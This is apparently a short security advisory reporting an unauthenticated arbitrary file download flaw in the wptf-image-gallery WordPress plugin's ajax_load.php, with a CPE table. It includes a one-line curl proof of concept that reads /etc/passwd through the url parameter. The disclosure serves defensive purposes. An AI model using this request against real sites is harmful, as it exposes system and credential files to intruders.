Plugin is still affected and has been closed. The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn’t sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files: 1
$ curl http://www.example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
CPE | Name | Operator | Version |
---|---|---|---|
wptf-image-gallery | eq | * |